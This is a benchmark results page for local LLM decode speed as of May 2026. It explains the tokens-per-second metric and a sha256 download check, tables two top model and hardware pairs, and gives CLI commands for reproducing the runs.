State of the local LLM — May 2026
The canonical answer to “what’s the fastest local LLM right now” as of May 2026, measured under llm-speed suite-v1. Numbers are wall-clock decode tok/s on the highest-decode workload that completed successfully. Every cell links to the run that produced it.
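To make the metric concrete: decode tok/s here means tokens emitted divided by wall-clock decode time, excluding prompt processing (prefill). A minimal sketch of that arithmetic — this is illustrative only, not the suite’s actual measurement harness, and `generate` is a hypothetical callable:

```python
import time

def decode_toks_per_sec(generate, n_tokens):
    """Wall-clock decode rate: tokens emitted / elapsed seconds.

    `generate` is assumed to decode `n_tokens` autoregressively,
    with prefill already done (so only decode time is measured).
    """
    start = time.perf_counter()
    generate(n_tokens)
    elapsed = time.perf_counter() - start
    return n_tokens / elapsed
```

A run that emits 1,000 tokens in 12.5 s of decode wall time would report 80.0 tok/s, which is the scale of the headline numbers below.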
Headline cells
Top decode tok/s — May 2026
| # | Model | Hardware | Backend | Decode tok/s | Run |
|---|---|---|---|---|---|
| 1 | Qwen3-Next-80B-A3B-Instruct-MLX-4bit | M3 Ultra (60-core GPU) + 96GB unified | mlx | 80.3 | r_1pl79r50ofy |
| 2 | Qwen3.6-27B-Q4_K_M.gguf | RTX 5090 (32GB) + AMD Ryzen 7 9850X3D (8c) + 30GB | llama.cpp | 69.9 | r_bqsunbd6xa8 |
Editor’s notes
Inaugural issue. These numbers are the canonical answer to “what’s the fastest local LLM right now,” measured under suite-v1 with the dual-domain trust chain in place (CDN sha256 + GitHub Releases mirror). The coding-agent and 70B-class headlines come from MLX on the M3 Ultra and llama.cpp on the RTX 5090, respectively. Future issues will add a delta column showing how each headline moved month over month.
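The dual-domain trust chain amounts to checking the downloaded artifact against two independently published sha256 digests (one from the CDN, one from the GitHub Releases mirror) and requiring all three to agree. A hedged sketch of that check — function names and the verification flow here are illustrative assumptions, not the actual `llm-speed verify` implementation:

```python
import hashlib

def sha256_of(path, chunk_size=1 << 20):
    # Stream the file so large wheels don't need to fit in memory.
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()

def dual_domain_check(wheel_path, cdn_digest, mirror_digest):
    # Accept only if the local file matches BOTH independently
    # published digests; a single compromised domain then fails.
    local = sha256_of(wheel_path)
    return local == cdn_digest == mirror_digest
```

The point of the two domains is that an attacker must tamper with both the CDN and the GitHub mirror consistently for a swapped artifact to pass.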
26 runs landed in May 2026. To reproduce any number on this page, install the CLI and run the suite on the same model + hardware:
pipx install https://llm-speed.com/dist/llm_speed-0.0.1-py3-none-any.whl
llm-speed verify
llm-speed bench
Methodology: /methodology · Privacy: /privacy · Source: github.com/meadow-kun/llm-speed